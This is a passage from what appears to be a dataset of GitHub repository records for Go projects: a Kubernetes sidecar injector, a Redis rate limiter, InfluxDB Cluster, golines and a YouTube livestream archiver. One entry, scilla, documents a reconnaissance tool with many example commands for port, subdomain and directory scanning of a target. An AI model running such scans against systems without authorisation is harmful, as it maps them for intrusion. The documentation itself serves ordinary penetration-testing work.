`test-ns` and label it with `sidecar-injector=enabled`:\n\n```\n# kubectl create ns test-ns\n# kubectl label namespace test-ns sidecar-injection=enabled\n# kubectl get namespace -L sidecar-injection\nNAME STATUS AGE SIDECAR-INJECTION\ndefault Active 26m\ntest-ns Active 13s enabled\nkube-public Active 26m\nkube-system Active 26m\nsidecar-injector Active 17m\n```\n\n2. Deploy an app in Kubernetes cluster, take `alpine` app as an example\n\n```bash\nkubectl -n test-ns run alpine \\\n --image=alpine \\\n --restart=Never \\\n --command -- sleep infinity\n```\n\n3. Verify sidecar container is injected:\n\n```\n# kubectl -n test-ns get pod\nNAME READY STATUS RESTARTS AGE\nalpine 2/2 Running 0 10s\n# kubectl -n test-ns get pod alpine -o jsonpath=\"{.spec.containers[*].name}\"\nalpine sidecar-nginx\n```\n\n## Troubleshooting\n\nSometimes you may find that pod is injected with sidecar container as expected, check the following items:\n\n1. The sidecar-injector pod is in running state and no error logs.\n2. The namespace in which application pod is deployed has the correct labels(`sidecar-injector=enabled`) as configured in `mutatingwebhookconfiguration`.\n3. Check if the application pod has annotation `sidecar-injector-webhook.morven.me/inject:\"yes\"`.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "go-redis/redis_rate", "link": "https://github.com/go-redis/redis_rate", "tags": ["redis", "gcra", "rate-limiting", "leaky-bucket"], "stars": 552, "description": "Rate limiting for go-redis", "lang": "Go", "repo_lang": "", "readme": "# Rate limiting for go-redis\n\n[![Build Status](https://travis-ci.org/go-redis/redis_rate.svg?branch=master)](https://travis-ci.org/go-redis/redis_rate)\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/go-redis/redis/v8)](https://pkg.go.dev/github.com/go-redis/redis_rate/v9)\n\n> :heart: [**Uptrace.dev** - distributed traces, logs, and errors in one place](https://uptrace.dev)\n\nThis package is based on [rwz/redis-gcra](https://github.com/rwz/redis-gcra) and implements\n[GCRA](https://en.wikipedia.org/wiki/Generic_cell_rate_algorithm) (aka leaky bucket) for rate\nlimiting based on Redis. The code requires Redis version 3.2 or newer since it relies on\n[replicate_commands](https://redis.io/commands/eval#replicating-commands-instead-of-scripts)\nfeature.\n\n## Installation\n\nredis_rate supports 2 last Go versions and requires a Go version with\n[modules](https://github.com/golang/go/wiki/Modules) support. So make sure to initialize a Go\nmodule:\n\n```shell\ngo mod init github.com/my/repo\n```\n\nAnd then install redis\\_rate/v9 (note **_v9_** in the import; omitting it is a popular mistake):\n\n```shell\ngo get github.com/go-redis/redis_rate/v9\n```\n\n## Example\n\n```go\npackage redis_rate_test\n\nimport (\n\t\"context\"\n\t\"fmt\"\n\n\t\"github.com/go-redis/redis/v8\"\n\t\"github.com/go-redis/redis_rate/v9\"\n)\n\nfunc ExampleNewLimiter() {\n\tctx := context.Background()\n\trdb := redis.NewClient(&redis.Options{\n\t\tAddr: \"localhost:6379\",\n\t})\n\t_ = rdb.FlushDB(ctx).Err()\n\n\tlimiter := redis_rate.NewLimiter(rdb)\n\tres, err := limiter.Allow(ctx, \"project:123\", redis_rate.PerSecond(10))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(\"allowed\", res.Allowed, \"remaining\", res.Remaining)\n\t// Output: allowed 1 remaining 9\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "edoardottt/scilla", "link": "https://github.com/edoardottt/scilla", "tags": ["hacking", "security", "information-retrieval", "pentesting", "hacking-tool", "penetration-testing", "enumeration", "security-tools", "recon", "ctf-tools", "network", "subdomain-scanner", "portscanner", "dns-enumeration", "port-enumeration", "information-gathering", "subdomains-enumeration", "directories-enumeration", "bugbounty", "reconnaissance"], "stars": 552, "description": "Information Gathering tool - DNS / Subdomains / Ports / Directories enumeration", "lang": "Go", "repo_lang": "", "readme": "

\n
\n \ud83c\udff4\u200d\u2620\ufe0f Information Gathering tool \ud83c\udff4\u200d\u2620\ufe0f - DNS / Subdomains / Ports / Directories enumeration
\n
\n \n \n \"go-report-card\"\n \n \n \n \"workflows\"\n \n \n \n \"ubuntu-build\"\n \n \n \n \"win10-build\"\n \n\n
\n \n \n \n \"pr-welcome\"\n \n \n \n \"Mainteinance\n \n \n \n \"ask\n \n \n \n \"license-GPL3\"\n \n
\n \n Coded with \ud83d\udc99 by edoardottt\n \n
\n \n Share on Twitter!\n \n

\n

\n Preview \u2022\n Install \u2022\n Get Started \u2022\n Examples \u2022\n Changelog \u2022\n Contributing \u2022\n License\n

\n\nPreview :bar_chart:\n----------\n\n\n\n

\n \n

\n\nInstallation \ud83d\udce1\n----------\n\n### Building from source\n\nYou need [Go](https://golang.org/).\n\n- **Linux**\n\n - `git clone https://github.com/edoardottt/scilla.git`\n - `cd scilla`\n - `make linux` (to install)\n - Edit the `~/.config/scilla/keys.yaml` file if you want to use API keys\n - `make unlinux` (to uninstall)\n\n- **Windows** (executable works only in scilla folder. [Alias?](https://github.com/edoardottt/scilla/issues/10))\n\n - `git clone https://github.com/edoardottt/scilla.git`\n - `cd scilla`\n - `.\\make.bat windows` (to install)\n - Create a `keys.yaml` file if you want to use api keys \n - `.\\make.bat unwindows` (to uninstall)\n\n### Using Docker\n\n```shell\ndocker build -t scilla .\ndocker run scilla help\n```\n\nGet Started \ud83c\udf89\n----------\n\n`scilla help` prints the help in the command line.\n\n```\nusage: scilla subcommand { options }\n\n Available subcommands:\n - dns [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-plain Print only results]\n -target REQUIRED\n - port [-p or ports divided by comma]\n [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-common scan common ports]\n [-plain Print only results]\n -target REQUIRED\n - subdomain [-w wordlist]\n [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-i ignore status codes]\n [-c use also a web crawler]\n [-db use also a public database]\n [-plain Print only results]\n [-db -no-check Don't check status codes for subdomains]\n [-db -vt Use VirusTotal as subdomains source]\n [-ua Set the User Agent]\n [-rua Generate a random user agent for each request]\n [-dns Set DNS IP to resolve the subdomains]\n [-alive Check also if the subdomains are alive]\n -target REQUIRED\n - dir [-w wordlist]\n [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-i ignore status codes]\n [-c use also a web crawler]\n [-plain Print only results]\n [-nr No follow redirects]\n [-ua Set the User Agent]\n [-rua Generate a random user agent for each request]\n -target REQUIRED\n - report [-p or ports divided by comma]\n [-ws subdomains wordlist]\n [-wd directories wordlist]\n [-oj JSON output file]\n [-oh HTML output file]\n [-ot TXT output file]\n [-id ignore status codes in directories scanning]\n [-is ignore status codes in subdomains scanning]\n [-cd use also a web crawler for directories scanning]\n [-cs use also a web crawler for subdomains scanning]\n [-db use also a public database for subdomains scanning]\n [-common scan common ports]\n [-nr No follow redirects]\n [-db -vt Use VirusTotal as subdomains source]\n [-ua Set the User Agent]\n [-rua Generate a random user agent for each request]\n [-dns Set DNS IP to resolve the subdomains]\n [-alive Check also if the subdomains are alive]\n -target REQUIRED\n - help\n - examples\n```\n\n\nExamples \ud83d\udca1\n----------\n\n- DNS enumeration:\n \n - `scilla dns -target target.domain`\n - `scilla dns -oj output -target target.domain`\n - `scilla dns -oh output -target target.domain`\n - `scilla dns -ot output -target target.domain`\n - `scilla dns -plain -target target.domain`\n\n- Subdomains enumeration:\n\n - `scilla subdomain -target target.domain`\n - `scilla subdomain -w wordlist.txt -target target.domain`\n - `scilla subdomain -oj output -target target.domain`\n - `scilla subdomain -oh output -target target.domain`\n - `scilla subdomain -ot output -target target.domain`\n - `scilla subdomain -i 400 -target target.domain`\n - `scilla subdomain -i 4** -target target.domain`\n - `scilla subdomain -c -target target.domain`\n - `scilla subdomain -db -target target.domain`\n - `scilla subdomain -plain -target target.domain`\n - `scilla subdomain -db -no-check -target target.domain`\n - `scilla subdomain -db -vt -target target.domain`\n - `scilla subdomain -ua \"CustomUA\" -target target.domain`\n - `scilla subdomain -rua -target target.domain`\n - `scilla subdomain -dns 8.8.8.8 -target target.domain`\n - `scilla subdomain -alive -target target.domain`\n\n- Directories enumeration:\n\n - `scilla dir -target target.domain`\n - `scilla dir -w wordlist.txt -target target.domain`\n - `scilla dir -oj output -target target.domain`\n - `scilla dir -oh output -target target.domain`\n - `scilla dir -ot output -target target.domain`\n - `scilla dir -i 500,401 -target target.domain`\n - `scilla dir -i 5**,401 -target target.domain`\n - `scilla dir -c -target target.domain`\n - `scilla dir -plain -target target.domain`\n - `scilla dir -nr -target target.domain`\n - `scilla dir -ua \"CustomUA\" -target target.domain`\n - `scilla dir -rua -target target.domain`\n\n- Ports enumeration:\n \n - Default (all ports, so 1-65635) `scilla port -target target.domain`\n - Specifying ports range `scilla port -p 20-90 -target target.domain`\n - Specifying starting port (until the last one) `scilla port -p 20- -target target.domain`\n - Specifying ending port (from the first one) `scilla port -p -90 -target target.domain`\n - Specifying single port `scilla port -p 80 -target target.domain`\n - Specifying output format (json)`scilla port -oj output -target target.domain`\n - Specifying output format (html)`scilla port -oh output -target target.domain`\n - Specifying output format (txt)`scilla port -ot output -target target.domain`\n - Specifying multiple ports `scilla port -p 21,25,80 -target target.domain`\n - Specifying common ports `scilla port -common -target target.domain`\n - Print only results `scilla port -plain -target target.domain`\n\n- Full report:\n \n - Default (all ports, so 1-65635) `scilla report -target target.domain`\n - Specifying ports range `scilla report -p 20-90 -target target.domain`\n - Specifying starting port (until the last one) `scilla report -p 20- -target target.domain`\n - Specifying ending port (from the first one) `scilla report -p -90 -target target.domain`\n - Specifying single port `scilla report -p 80 -target target.domain`\n - Specifying output format (json)`scilla report -oj output -target target.domain`\n - Specifying output format (html)`scilla report -oh output -target target.domain`\n - Specifying output format (txt)`scilla report -ot output -target target.domain`\n - Specifying directories wordlist `scilla report -wd dirs.txt -target target.domain`\n - Specifying subdomains wordlist `scilla report -ws subdomains.txt -target target.domain`\n - Specifying status codes to be ignored in directories scanning `scilla report -id 500,501,502 -target target.domain`\n - Specifying status codes to be ignored in subdomains scanning `scilla report -is 500,501,502 -target target.domain`\n - Specifying status codes classes to be ignored in directories scanning `scilla report -id 5**,4** -target target.domain`\n - Specifying status codes classes to be ignored in subdomains scanning `scilla report -is 5**,4** -target target.domain`\n - Use also a web crawler for directories enumeration `scilla report -cd -target target.domain`\n - Use also a web crawler for subdomains enumeration `scilla report -cs -target target.domain`\n - Use also a public database for subdomains enumeration `scilla report -db -target target.domain`\n - Specifying multiple ports `scilla report -p 21,25,80 -target target.domain`\n - Specifying common ports `scilla report -common -target target.domain`\n - No follow redirects `scilla report -nr -target target.domain`\n - Use VirusTotal as subdomains source `scilla report -db -vt -target target.domain`\n - Set the User Agent `scilla report -ua \"CustomUA\" -target target.domain`\n - Generate a random user agent for each request `scilla report -rua -target target.domain`\n - Set DNS IP to resolve the subdomains `scilla report -dns 8.8.8.8 -target target.domain`\n - Check also if the subdomains are alive `scilla report -alive -target target.domain`\n\nChangelog \ud83d\udccc\n-------\nDetailed changes for each release are documented in the [release notes](https://github.com/edoardottt/scilla/releases).\n\nContributing \ud83d\udee0\n-------\n\nJust open an [issue](https://github.com/edoardottt/scilla/issues) / [pull request](https://github.com/edoardottt/scilla/pulls).\n\nBefore opening a pull request, download [golangci-lint](https://golangci-lint.run/usage/install/) and run\n```bash\ngolangci-lint run\n```\nIf there aren't errors, go ahead :)\n\n**Help me building this!**\n\nSpecial thanks to: [danielmiessler](https://github.com/danielmiessler), [sonarSearch](https://github.com/cgboal/sonarsearch), [HackerTarget](https://hackertarget.com/), [BufferOverrun](http://dns.bufferover.run/), [Threatcrowd](https://www.threatcrowd.org/), [Crt.sh](https://crt.sh/), [VirusTotal](https://www.virustotal.com/), [tomnomnom](https://github.com/tomnomnom/assetfinder).\n\n**To do:**\n\n - [ ] Add more tests\n \n - [ ] Tor support\n \n - [ ] Proxy support\n\nIn the news \ud83d\udcf0\n-------\n\n- [Kali Linux Tutorials](https://kalilinuxtutorials.com/scilla/)\n- [GeeksForGeeks.org](https://www.geeksforgeeks.org/scilla-information-gathering-dns-subdomain-port-enumeration/)\n- [Brisk Infosec](https://www.briskinfosec.com/tooloftheday/toolofthedaydetail/Scilla)\n- [Kalitut](https://kalitut.com/scilla-nformation-gathering-tool/)\n \nLicense \ud83d\udcdd\n-------\n\nThis repository is under [GNU General Public License v3.0](https://github.com/edoardottt/scilla/blob/main/LICENSE). \n[edoardoottavianelli.it](https://www.edoardoottavianelli.it) to contact me.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chengshiwen/influxdb-cluster", "link": "https://github.com/chengshiwen/influxdb-cluster", "tags": ["influxdb", "clustering", "high-availability", "influxdb-enterprise", "influxdb-cluster"], "stars": 552, "description": "InfluxDB Cluster - Open Source Alternative to InfluxDB Enterprise", "lang": "Go", "repo_lang": "", "readme": "# InfluxDB Cluster\n\n[![CN doc](https://img.shields.io/badge/\u6587\u6863-\u4e2d\u6587\u7248-blue.svg)](https://github.com/chengshiwen/influxdb-cluster/wiki)\n[![EN doc](https://img.shields.io/badge/document-English-blue.svg)](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng)\n[![LICENSE](https://img.shields.io/github/license/chengshiwen/influxdb-cluster.svg)](https://github.com/chengshiwen/influxdb-cluster/blob/master/LICENSE)\n[![Releases](https://img.shields.io/github/v/release/chengshiwen/influxdb-cluster.svg)](https://github.com/chengshiwen/influxdb-cluster/releases)\n![GitHub stars](https://img.shields.io/github/stars/chengshiwen/influxdb-cluster.svg?label=github%20stars&logo=github)\n[![Docker pulls](https://img.shields.io/docker/pulls/chengshiwen/influxdb.svg)](https://hub.docker.com/r/chengshiwen/influxdb)\n\nInfluxDB Cluster - An Open-Source Distributed Time Series Database, Open Source Alternative to InfluxDB Enterprise\n\n## An Open-Source, Distributed, Time Series Database\n\nInfluxDB Cluster is an open source **time series database** with\n**no external dependencies**. It's useful for recording metrics,\nevents, and performing analytics.\n\nInfluxDB Cluster is inspired by [InfluxDB Enterprise](https://docs.influxdata.com/enterprise_influxdb/v1.8/), [InfluxDB v1.8.10](https://github.com/influxdata/influxdb/tree/v1.8.10) and [InfluxDB v0.11.1](https://github.com/influxdata/influxdb/tree/v0.11.1), aiming to replace InfluxDB Enterprise.\n\nInfluxDB Cluster is easy to maintain, and can be updated in real time with upstream [InfluxDB 1.x](https://github.com/influxdata/influxdb/tree/master-1.x).\n\n## Features\n\n* Built-in [HTTP API](https://docs.influxdata.com/influxdb/latest/guides/writing_data/) so you don't have to write any server side code to get up and running.\n* Data can be tagged, allowing very flexible querying.\n* SQL-like query language.\n* Clustering is supported out of the box, so that you can scale horizontally to handle your data. **Clustering is currently in production state.**\n* Simple to install and manage, and fast to get data in and out.\n* It aims to answer queries in real-time. That means every data point is\n indexed as it comes in and is immediately available in queries that\n should return in < 100ms.\n\n## Clustering\n\n> **Note**: The clustering of InfluxDB Cluster is exactly the same as that of InfluxDB Enterprise.\n\nPlease see: [Clustering in InfluxDB Enterprise](https://docs.influxdata.com/enterprise_influxdb/v1.8/concepts/clustering/)\n\nArchitectural overview:\n\n![architecture.png](https://iili.io/Vw1XTB.png)\n\nNetwork overview:\n\n![architecture](https://docs.influxdata.com/img/enterprise/1-8-network-diagram.png)\n\n## Installation\n\nWe recommend installing InfluxDB Cluster using one of the [pre-built releases](https://github.com/chengshiwen/influxdb-cluster/releases).\n\nComplete the following steps to install an InfluxDB Cluster in your own environment:\n\n1. [Install InfluxDB Cluster meta nodes](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng#meta-node-setup)\n2. [Install InfluxDB Cluster data nodes](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng#data-node-setup)\n\n> **Note**: The installation of InfluxDB Cluster is exactly the same as that of InfluxDB Enterprise.\n\n## Docker Quickstart\n\nDownload [docker-compose.yml](./docker/quick/docker-compose.yml), then start 3 meta nodes and 2 data nodes by `docker-compose`:\n\n```\ndocker-compose up -d\ndocker exec -it influxdb-meta-01 bash\ninfluxd-ctl add-meta influxdb-meta-01:8091\ninfluxd-ctl add-meta influxdb-meta-02:8091\ninfluxd-ctl add-meta influxdb-meta-03:8091\ninfluxd-ctl add-data influxdb-data-01:8088\ninfluxd-ctl add-data influxdb-data-02:8088\ninfluxd-ctl show\n```\n\nStop and remove them when they are no longer in use:\n\n```\ndocker-compose down -v\n```\n\n## Getting Started\n\n### Create your first database\n\n```\ncurl -XPOST \"http://influxdb-data-01:8086/query\" --data-urlencode \"q=CREATE DATABASE mydb WITH REPLICATION 2\"\n```\n\n### Insert some data\n```\ncurl -XPOST \"http://influxdb-data-01:8086/write?db=mydb\" \\\n-d 'cpu,host=server01,region=uswest load=42 1434055562000000000'\n\ncurl -XPOST \"http://influxdb-data-02:8086/write?db=mydb&consistency=all\" \\\n-d 'cpu,host=server02,region=uswest load=78 1434055562000000000'\n\ncurl -XPOST \"http://influxdb-data-02:8086/write?db=mydb&consistency=quorum\" \\\n-d 'cpu,host=server03,region=useast load=15.4 1434055562000000000'\n```\n\n> **Note**: `consistency=[any,one,quorum,all]` sets the write consistency for the point. `consistency` is `one` if you do not specify consistency. See the [Insert some data / Write consistency](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng#insert-some-data) for detailed descriptions of each consistency option.\n\n### Query for the data\n```\ncurl -G \"http://influxdb-data-02:8086/query?pretty=true\" --data-urlencode \"db=mydb\" \\\n--data-urlencode \"q=SELECT * FROM cpu WHERE host='server01' AND time < now() - 1d\"\n```\n\n### Analyze the data\n```\ncurl -G \"http://influxdb-data-02:8086/query?pretty=true\" --data-urlencode \"db=mydb\" \\\n--data-urlencode \"q=SELECT mean(load) FROM cpu WHERE region='uswest'\"\n```\n\n## Documentation\n\n* View the wiki: [English Document](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng) / [\u4e2d\u6587\u6587\u6863](https://github.com/chengshiwen/influxdb-cluster/wiki/Home).\n* Read more about the [design goals and motivations of the project](https://docs.influxdata.com/enterprise_influxdb/v1.8/).\n* Follow the [getting started guide](https://docs.influxdata.com/enterprise_influxdb/v1.8/introduction/getting-started/) to learn the basics in just a few minutes.\n* Learn more about [clustering](https://docs.influxdata.com/enterprise_influxdb/v1.8/concepts/clustering/) and [glossary](https://docs.influxdata.com/enterprise_influxdb/v1.8/concepts/glossary/).\n\n## Contributing\n\nIf you're feeling adventurous and want to contribute to InfluxDB Cluster, see our [CONTRIBUTING.md](./CONTRIBUTING.md) for info on how to make feature requests, build from source, and run tests.\n\n## Licensing\n\nSee [LICENSE](./LICENSE) and [DEPENDENCIES.md](./DEPENDENCIES.md).\n\n## Looking for Support?\n\n- Email: chengshiwen@apache.org\n- [GitHub Issues](https://github.com/chengshiwen/influxdb-cluster/issues)\n- [Community & Communication](https://github.com/chengshiwen/influxdb-cluster/wiki/Home-Eng#community--communication) / [\u793e\u533a & \u4ea4\u6d41](https://github.com/chengshiwen/influxdb-cluster/wiki#\u793e\u533a--\u4ea4\u6d41)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "segmentio/golines", "link": "https://github.com/segmentio/golines", "tags": [], "stars": 552, "description": "A golang formatter that fixes long lines", "lang": "Go", "repo_lang": "", "readme": "[![Circle CI](https://circleci.com/gh/segmentio/golines.svg?style=svg&circle-token=b1d01d8b035ef0aa71ccd183580586a80cd85271)](https://circleci.com/gh/segmentio/golines)\n[![Go Report Card](https://goreportcard.com/badge/github.com/segmentio/golines)](https://goreportcard.com/report/github.com/segmentio/golines)\n[![GoDoc](https://godoc.org/github.com/segmentio/golines?status.svg)](https://godoc.org/github.com/segmentio/golines)\n[![Coverage](https://img.shields.io/badge/Go%20Coverage-84%25-brightgreen.svg?longCache=true&style=flat)](https://gocover.io/github.com/segmentio/golines?version=1.13.x)\n\n# golines\n\nGolines is a golang formatter that shortens long lines, in addition to all\nof the formatting fixes done by [`gofmt`](https://golang.org/cmd/gofmt/).\n\n## Motivation\n\nThe standard golang formatting tools (`gofmt`, `goimports`, etc.) are great, but\n[deliberately don't shorten long lines](https://github.com/golang/go/issues/11915); instead, this\nis an activity left to developers.\n\nWhile there are different tastes when it comes to line lengths in go, we've generally found\nthat very long lines are more difficult to read than their shortened alternatives. As an example:\n\n```go\nmyMap := map[string]string{\"first key\": \"first value\", \"second key\": \"second value\", \"third key\": \"third value\", \"fourth key\": \"fourth value\", \"fifth key\": \"fifth value\"}\n```\n\nvs.\n\n```go\nmyMap := map[string]string{\n\t\"first key\": \"first value\",\n\t\"second key\": \"second value\",\n\t\"third key\": \"third value\",\n\t\"fourth key\": \"fourth value\",\n\t\"fifth key\": \"fifth value\",\n}\n```\n\nWe built `golines` to give go developers the option to automatically shorten long lines, like\nthe one above, according to their preferences.\n\nMore background and technical details are available in\n[this blog post](https://yolken.net/blog/cleaner-go-code-golines).\n\n## Examples\n\nSee this [before](_fixtures/end_to_end.go) and [after](_fixtures/end_to_end__exp.go)\nview of a file with very long lines. More example pairs can be found in the\n[`_fixtures`](_fixtures) directory.\n\n## Version support\n\nThe latest version of `golines` requires golang 1.18 or newer due to generics-related dependencies.\nIf you need to use `golines` with an older version of go, install the tool from the `v0.9.0`\nrelease.\n\n## Usage\n\nFirst, install the tool. If you're using golang 1.18 or newer, run:\n\n```\ngo install github.com/segmentio/golines@latest\n```\n\nOtherwise, for older golang versions, run:\n\n```\ngo install github.com/segmentio/golines@v0.9.0\n```\n\nThen, run:\n\n```\ngolines [paths to format]\n```\n\nThe paths can be either directories or individual files. If no paths are\nprovided, then input is taken from `stdin` (as with `gofmt`).\n\nBy default, the results are printed to `stdout`. To overwrite the existing\nfiles in place, use the `-w` flag.\n\n## Options\n\nSome other options are described in the sections below. Run `golines --help` to see\nall available flags and settings.\n\n#### Line length settings\n\nBy default, the tool tries to shorten lines that are longer than 100 columns\nand assumes that 1 tab = 4 columns. The latter can be changed via the\n`-m` and `-t` flags respectively.\n\n#### Dry-run mode\n\nRunning the tool with the `--dry-run` flag will show pretty, git-style diffs.\n\n#### Comment shortening\n\nShortening long comment lines is harder than shortening code because comments can\nhave arbitrary structure and format. `golines` includes some basic\nlogic for shortening single-line (i.e., `//`-prefixed) comments, but this is turned\noff by default since the quality isn't great. To enable this feature anyway, run\nwith the `--shorten-comments` flag.\n\n#### Custom formatters\n\nBy default, the tool will use [`goimports`](https://godoc.org/golang.org/x/tools/cmd/goimports) as\nthe base formatter (if found), otherwise it will revert to `gofmt`. An explicit formatter can be\nset via the `--base-formatter` flag; the command provided here should accept its input via\n`stdin` and write its output to `stdout`.\n\n#### Generated files\n\nBy default, the tool will not format any files that look like they're generated. If you\nwant to reformat these too, run with the `--no-ignore-generated` flag.\n\n#### Chained method splitting\n\nThere are several possible ways to split lines that are part of\n[method chains](https://en.wikipedia.org/wiki/Method_chaining). The original\napproach taken by `golines` was to split on the args, e.g.:\n\n```go\nmyObj.Method(\n\targ1,\n\targ2,\n\targ3,\n).AnotherMethod(\n\targ1,\n\targ2,\n).AThirdMethod(\n\targ1,\n\targ2,\n)\n```\n\nStarting in version 0.3.0, the tool now splits on the dots by default, e.g.:\n\n```go\nmyObj.Method(arg1, arg2, arg3).\n\tAnotherMethod(arg1, arg2).\n\tAThirdMethod(arg1, arg2)\n```\n\nThe original behavior can be used by running the tool with the `--no-chain-split-dots`\nflag.\n\n#### Struct tag reformatting\n\nIn addition to shortening long lines, the tool also aligns struct tag keys; see the\nassociated [before](_fixtures/struct_tags.go) and [after](_fixtures/struct_tags__exp.go)\nexamples in the `_fixtures` directory. To turn this behavior off, run with `--no-reformat-tags`.\n\n## Developer Tooling Integration\n\n### vim-go\n\nAdd the following lines to your vimrc, substituting `128` with your preferred line length:\n\n```vim\nlet g:go_fmt_command = \"golines\"\nlet g:go_fmt_options = {\n \\ 'golines': '-m 128',\n \\ }\n```\n\n### Visual Studio Code\n\n1. Install the [Run on Save](https://marketplace.visualstudio.com/items?itemName=emeraldwalk.RunOnSave) extension\n2. Go into the VSCode settings menu, scroll down to the section for the \"Run on Save\"\n extension, click the \"Edit in settings.json\" link\n3. Set the `emeraldwalk.runonsave` key as follows (adding other flags to the `golines`\n command as desired):\n\n```\n \"emeraldwalk.runonsave\": {\n \"commands\": [\n {\n \"match\": \"\\\\.go$\",\n \"cmd\": \"golines ${file} -w\"\n }\n ]\n }\n```\n\n4. Save the settings and restart VSCode\n\n### Goland\n\n1. Go into the Goland settings and click \"Tools\" -> \"File Watchers\" then click the plus to create a new file watcher\n2. Set the following properties and confirm by clicking OK:\n - __Name:__ `golines`\n - __File type:__ `Go files`\n - __Scope:__ `Project Files`\n - __Program:__ `golines`\n - __Arguments:__ `$FilePath$ -w`\n - __Output paths to refresh:__ `$FilePath$`\n3. Activate your newly created file watcher in the Goland settings under \"Tools\" -> \"Actions on save\"\n\n### Others\n\nComing soon.\n\n## How It Works\n\nFor each input source file, `golines` runs through the following process:\n\n1. Read the file, break it into lines\n2. Add a specially-formatted annotation (comment) to each line that's longer\n than the configured maximum\n3. Use [Dave Brophy's](https://github.com/dave) excellent\n [decorated syntax tree](https://github.com/dave/dst) library to parse the code\n plus added annotations\n4. Do a depth-first traversal of the resulting tree, looking for nodes\n that have an annotation on them\n5. If a node is part of a line that's too long, shorten it by altering\n the newlines around the node and/or its children\n6. Repeat steps 2-5 until no more shortening can be done\n7. Run the base formatter (e.g., `gofmt`) over the results, write these to either\n `stdout` or the source file\n\nSee [this blog post](https://yolken.net/blog/cleaner-go-code-golines) for more technical details.\n\n## Limitations\n\nThe tool has been tested on a variety of inputs, but it's not perfect. Among\nother examples, the handling of long lines in comments could be improved. If you see\nanything particularly egregious, please report via an issue.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Kethsar/ytarchive", "link": "https://github.com/Kethsar/ytarchive", "tags": [], "stars": 551, "description": "Garbage Youtube livestream downloader", "lang": "Go", "repo_lang": "", "readme": "# ytarchive\n\nAttempt to archive a given Youtube livestream from the start. This is most useful for streams that have already started and you want to download, but can also be used to wait for a scheduled stream and start downloading as soon as it starts. If you want to download a VOD, I recommend [yt-dlp](https://github.com/yt-dlp/yt-dlp), which is an actively maintained fork of youtube-dl with more features.\n\nA [WebUI front-end](https://github.com/lekoOwO/ytarchive-ui) was created by leko, if that's something you want. Note that I do not use this myself and cannot comment on how well it works or looks, but it could be useful if you want to set up downloading on a remote server, or make a service out of it.\n\n## Dependencies\n\n- [FFmpeg](https://ffmpeg.org/) needs to be installed to mux the final file.\n\n## Installation\n\nDownload the latest pre-release from [the releases page](https://github.com/Kethsar/ytarchive/releases)\n\nIf you use [Homebrew](https://brew.sh), you can install it by running\n\n```shell\nbrew install danirukun/ytarchive/ytarchive\n```\n\nAlternatively, if you have Go properly installed and set up, run `go install github.com/Kethsar/ytarchive@master`\n\n`@master` is required because of some bullshit caching Go package proxies do. Should have used Rust...\n\n## Usage\n\n```\nusage: ytarchive [OPTIONS] [url] [quality]\n\n\t[url] is a youtube livestream URL. If not provided, you will be\n\tprompted to enter one.\n\n\t[quality] is a slash-delimited list of video qualities you want\n\tto be selected for download, from most to least wanted. If not\n\tprovided, you will be prompted for one, with a list of available\n\tqualities to choose from. The following values are valid:\n\taudio_only, 144p, 240p, 360p, 480p, 720p, 720p60, 1080p, 1080p60, 1440p, 1440p60, 2160p, 2160p60, best\n\nOptions:\n\t-h\n\t--help\n\t\tShow this help message.\n\n\t-4\n\t--ipv4\n\t\tMake all connections using IPv4.\n\n\t-6\n\t--ipv6\n\t\tMake all connections using IPv6.\n\n\t--add-metadata\n\t\tWrite some basic metadata information to the final file.\n\n\t--audio-url GOOGLEVIDEO_URL\n\t\tPass in the given url as the audio fragment url. Must be a\n\t\tGoogle Video url with an itag parameter of 140.\n\n\t-c\n\t--cookies COOKIES_FILE\n\t\tGive a cookies.txt file that has your youtube cookies. Allows\n\t\tthe script to access members-only content if you are a member\n\t\tfor the given stream's user. Must be netscape cookie format.\n\n\t--debug\n\t\tPrint a lot of extra information.\n\n\t--error\n\t\tPrint only errors and general information.\n\n\t--ffmpeg-path FFMPEG_PATH\n\t\tSet a specific ffmpeg location, including program name.\n\t\te.g. \"C:\\ffmpeg\\ffmpeg.exe\" or \"/opt/ffmpeg/ffmpeg\"\n\n\t--h264\n\t\tOnly download h264 video, skipping VP9 if it would have been used.\n\n\t-k\n\t--keep-ts-files\n\t\tKeep the final stream audio and video files after muxing them\n\t\tinstead of deleting them.\n\n\t--merge\n\t\tAutomatically run the ffmpeg command for the downloaded streams\n\t\twhen sigint is received. You will be prompted otherwise.\n\n\t--metadata KEY=VALUE\n\t\tIf writing metadata, overwrite/add metadata key-value entry.\n\t\tKEY is a metadata key that ffmpeg recognizes. If invalid, ffmpeg may ignore it or error.\n\t\tVALUE is a format template. If empty string (''), omit writing metadata for the key.\n\t\tSee FORMAT TEMPLATE OPTIONS below for a list of available format keys.\n\t\tCan be used multiple times.\n\n\t--mkv\n\t\tMux the final file into an mkv container instead of an mp4 container.\n\t\tIgnored when downloading audio only.\n\n\t--monitor-channel\n\t\tContinually monitor a channel for streams. Requires using a /live URL.\n\t\tThis will go back to checking for a stream after it finishes downloading\n\t\tthe current one. Implies '-r 60 --merge' unless set separately. Minimum\n\t\t30 second wait time, 60 or more recommended. Using 'best' for quality or\n\t\tsetting a decently exhaustive list recommended to prevent waiting for\n\t\tinput if selected quality is not available for certain streams.\n\t\tBe careful to monitor your disk usage when using this to avoid filling\n\t\tyour drive while away.\n\n\t--no-audio\n\t\tDo not download the audio 